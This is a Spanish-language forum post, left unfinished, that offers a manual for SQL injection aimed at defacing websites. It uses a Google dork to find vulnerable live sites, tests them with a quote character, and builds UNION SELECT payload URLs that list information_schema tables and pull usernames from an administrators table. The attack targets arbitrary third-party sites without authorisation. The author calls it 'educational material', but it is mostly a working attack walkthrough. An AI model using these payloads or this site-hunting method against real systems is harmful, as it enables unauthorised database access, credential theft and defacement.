Hola, estaba aquí viendo los mensajes y un usuario me pidió ayuda y utilizé el buscador; extrañamente, vi muchos post sobre como hacer una sql
injection y bueno, aquí os dejo un manual que iré modificando a lo largo del tiempo por que es un poquito largo pero no infinito.
Para empezar, debemos tener alguna mínima idea sobre el lenguaje SQL, si no tienes ni idea, no sigas :L. Si sabes algo, solo es cuestión de leer y
ponerse a la practica
¿Que es SQL Injection?
nyección SQL es una vulnerabilidad informática en el nivel de la validación de las entradas a la base de datos de una aplicación. El origen es el filtrado incorrecto de las variables utilizadas en las partes del programa con código SQL. Es, de hecho, un error de una clase más general de vulnerabilidades que puede ocurrir en cualquier lenguaje de programación o de script que esté incrustado dentro de otro.
Una inyección SQL sucede cuando se inserta o "inyecta" un código SQL "invasor" dentro de otro código SQL para alterar su funcionamiento normal, y hacer que se ejecute maliciosamente el código "invasor" en la base de datos.
La inyección SQL es un problema de seguridad informática que debe ser tomado en cuenta por el programador para prevenirlo. Un programa hecho con descuido, displicencia, o con ignorancia sobre el problema, podrá ser vulnerable y la seguridad del sistema puede quedar ciertamente comprometida. Esto puede suceder tanto en programas ejecutándose en com*****dores de escritorio, como en páginas Web, ya que éstas pueden funcionar mediante programas ejecutándose en el servidor que las aloja.
La vulnerabilidad puede ocurrir cuando un programa "arma" descuidadamente una sentencia SQL, con parámetros dados por el usuario, para luego hacer una consulta a una base de datos. Dentro de los parámetros dados por el usuario podría venir el código SQL inyectado.
Al ejecutarse esa consulta por la base de datos, el código SQL inyectado también se ejecutará y podría hacer un sinnúmero de cosas, como insertar registros, modificar o eliminar datos, autorizar accesos e, incluso, ejecutar código malicioso en el com*****dor. (
Fuente Wikipedia)
¿Que es Deface?
El Deface / Defacing / Defacement es la modificación de una página web sin autorización del dueño de la misma.
La mayoria de las veces logran defacear un sitio consiguiendo acceso mediante alguna vulnerabilidad que el programador haya dejado en el mismo.
También por passwords debiles, problemas en el FTP, etc
¡Empezamos!
1- Buscamos paginas webs que puedan ser vulnerablesPara ello, solo debemos poner en google :
inurl:index.php?id= (En vez de index suele frecuentar article, buy, category... ect.)
2- Comprobamos si es vulnerable o noDespues de los resultados obtenidos por google, debemos cambiar el numero (Ejemplo: 1) por el signo
'... De tal forma
que quedará de la siguiente manera:
http://www.URL.com/index.php?id='
Espero que me esteis siguiendo hasta aquí. Despues de haber colocado esa coma, si vemos esto :

es que la pagina es vulnerable a ataques SQL
3-Primeras consultasAhora debemos
sustituir la ' por :
-1+union+all+select+0 de tal manera que quedaría así:
http://www.URL.com/index.php?id=-1+union+all+select+0
¡Pero si no sale nada!. Tranqui, como ves hay un 0 en la barra que hemos puesto pues solo debes
seguir poniendo numero de esta forma : 0,1,2,3....
HASTA que nos tire en la pantalla unos
numeros como en esta imagen:

Yo por ejemplo voy a escoger el 5 (
Recuerda que a ti te pueden salir otros diferentes) y ahora vamos a volver a modificar la barra de
direcciones y vamos a sumarle algo a lo que teniamos antes, es decir, fijate en el ejemplo:
http://www.URL.com/index.php?id=-1+union+all+select+0,1,2,3,4,5,6,7,8
Yo lo pongo hasta el 8 por que es justo en ese numero cuando me saltaron los numeros. Tu pones el tuyo correspondiente.
Una vez tengamos esa barra de direcciones, debemos modificarla por la siguiente URL:
http://www.URL.com/index.php?id=-1+union+all+select+0,1,2,3,4,table_name,6,7,8+from+information_schema.tables--
He cambiado el 5 por table_name por que si recuerdas, elegí el 5 que estaba en los numeros que nos salieron
4- Visualizamos las tablasSi entramos a la URL final del paso 3, en pantalla debería mostrarse:
CHARACTER_SETS. Si te sale es que has hecho todo correctamente
hasta ahora. Esa sería la primera tabla. Ahora para ver las demás tablas, debemos poner en la URL lo siguiente:
+limit+1,1--.
http://www.URL.com/index.php?id=-1+union+all+select+0,1,2,3,4,table_name,6,7,8+from+information_schema.tables+limit+1,1--
De esta forma va a quedar así nuestra URL, fijate muy bien en los pequeños detalles.
Ahora solo debes cambiar el primer uno de
+limit+1,1-- por el siguiente, es decir , asi:
+limit+2,1-- y así continuamente HASTA que
veamos una tabla sospechosa que pueda ser la de los usuarios o administradores.
Si te sale alguna de estas tablas : PROFILING,USER_PRIVILEGES,VIEWS., pasa de ellas, no sirrven para nada pero llaman la atencion
5- Encontramos la tabla que puede ser la de los usuarios Una vez que encontremos la tabla que creemos que puede ser la de los administradores, usuarios, ect.. pasamos al ataque. Si no lo tienes claro,
este es un ejemplo de lo que debe salir, pero no tiene por que ser administradores.:

Ahora que ya tenemos el nombre de la tabla , que vuelvo a repetir que puede que no sea administradores si no otro, procedemos a hacer otros
cambios en la barra de direcciones. Debemos modificar
information_schema.tables+limit+numeroquetesalio,1-- por el nombre de la tabla:
http://www.URL.com/index.php?id=-1+union+all+select+0,1,2,3,4,table_name,6,7,8+from+Administradores
Una vez llegado hasta aquí, hay que modificar
table_name por el nombre de la columna de los usuarios, por ejemplo: nombre o usuarios o
usuario o admin... puede ser muchisimas cosas. Pero la cosa quedaría así:
http://www.URL.com/index.php?id=-1+union+all+select+0,1,2,3,4,usuarios,6,7,8+from+Administradores
Si usuarios es la columna de la tabla administradores, nos debería tirar en la pantalla el nombre del administrador o de un usuarios. Mira la imagen:

¡Luego continuo que esto cansa....! ¡¡Material edducativo!!